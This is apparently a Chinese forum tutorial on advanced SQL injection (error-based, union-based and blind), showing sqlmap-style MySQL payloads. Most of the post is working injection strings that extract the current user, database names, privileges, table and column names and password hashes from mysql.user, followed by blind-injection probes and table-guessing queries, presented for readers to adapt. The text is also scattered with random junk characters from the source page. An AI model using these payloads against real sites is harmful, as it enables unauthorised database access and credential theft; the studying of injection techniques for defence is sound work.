放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。: c) e9 G, `& K `, ~
' e" c% B0 o7 Z! x这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表3 H' j% G* L& A l Y
: L a3 Q- e8 M% f/ g5 @0 ^. R- `分类标准 分类 备注
/ s' C a2 h! C3 ^3 P) u. n9 }# i按字段类型 整型注入,字符型注入 2 Y) l# m& [9 ~. d
按出现的位置 get注入,post注入,cookie注入,http header注入 ! V. E5 f( q8 a+ m0 A& P! p
然而高级注入是这样的4 g5 X+ C% E9 G- o7 ~/ }* q
, ]" ]" Y0 R: e! s# j
高级注入分类 条件" g& l* Y1 d# B) Q* Q
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
1 B. W. U( U8 ?3 n+ H. R% u! L! e" q: Aunion-based sql 能够使用union,存在数据库,表结构! D2 s3 ^! C N7 }6 x& u7 u0 v
blind sql 存在注入
$ z6 i/ j7 {$ B. V3 X4 c3 h; b我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
; C+ q! h+ r% w2 P' Z% E
/ b2 k, a9 s) I- P6 q; v( J$ t好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火' q/ y- n* ]% O) Y5 Y1 x8 K+ P4 H
, e# V* [2 F) C! v# `
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。+ h9 S7 Q2 X, b4 N: V7 y
6 }" i' |5 w; R- |; O8 ~这里用mysql说明
6 S; S* z3 w* T# \" U) V ( w5 Z: X- y7 z# J5 u4 }" b
e注入坛子里很多了,请看戳我或者再戳我& e' U$ D/ r' [* j6 |3 r
0 r0 G" n. a) c* g+ N& f5 mu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
5 G- B# A7 M% q% A ! p! p7 q. o- B% w
获取当前数据库用户名8 z' P$ T1 m& o
6 L, j7 P; s5 `5 Q" P2 ^UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
* t! m) W: T% E. p- ^AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL+ e0 J( e* C; D# R5 V
L, NULL#
/ \. H9 z; T) Y. I注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。/ W) J% b6 D6 h1 r
5 p' q4 `, f9 E; a7 A8 n+ W: v
获取数据库名8 b, d0 A% [1 M- o
2 ?) f" I4 t% f/ M6 l: {UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
& |. c2 I: Q! V& q& ~) j+ v获取所有用户名
: S7 Y, n7 ^9 ^
& w% x# }1 {8 M) f4 ^8 X5 {- }! QUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#: Q- h6 w9 \) Q7 A1 X. A) p
查看当前用户权限2 u# i8 I9 S9 p4 m6 M% E1 F+ b1 S/ u
( I# ~ l5 k9 X3 ]) Q3 RUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#7 L5 l: c6 _1 P; m- l$ B6 F3 }% U& `1 ?
尝试获取密码,当然需要有能读mysql数据库的权限/ m4 d; o/ T! H" I
/ R E, f6 e' a: m: v; d+ B6 k
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
, v+ e, j8 r I- I获取表名,limit什么的自己搞啦
/ h5 a* b5 ]! S) D9 f8 ]
6 [; V1 M* R# c, cUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
0 B0 V( e9 ^ H/ \8 ?2 A* ~, K4 Q获取字段名及其类型4 [' v$ y z! m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#; E, H* i1 H, V N0 r
8 _: ]7 v7 @% @6 e' t$ G+ M( m
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
0 |- f, {7 C( M6 S7 t, Z0 A " x3 j- z! Q; \ y9 J- S. j
如:7 n& { f. q4 p* H
获取当前用户名
+ ^& }$ A2 M% N. o% e * `) _3 J% y3 S% c$ c" M% D
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
R3 \; r( C" i f+ [0 S获取当前数据库
- q! P6 l6 ~9 L/ G- v- k
$ t0 b4 Q* u" M- g" q; KAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
2 N' ~/ W: i8 z6 m) d0 A获取表名+ ~9 G' Z; \4 u) i: ?& i
# u7 s. C6 m2 E; i( l2 d" [
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51. E4 y) ]5 H5 @0 N
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
: y4 H8 v3 q( S0 c. k% h回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
8 K; G8 W- X/ W% E: w$ M7 M爆表; O% g0 c: g$ o/ e, Y1 F! @
2 h; K2 g6 ]) ]) j0 f# b) Q1 CAND EXISTS(select * from table)7 o, H. M# Y V% G" s& W# e, E
爆字段
- p( Q5 `, J8 n% b5 ?; H
- t! m6 ^+ Y% N. x! M7 J8 B2 H8 nAND EXISTS(select pwd from table)
- R9 F% F @3 e. o% K) O# p盲注的变化就比较多了,由于篇幅,只是举个例子而已。
: _8 y) M7 O( O- {& ~$ i ; Y. z0 R) I+ o' M/ p( m$ i+ D
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
3 S" v1 }# E) a |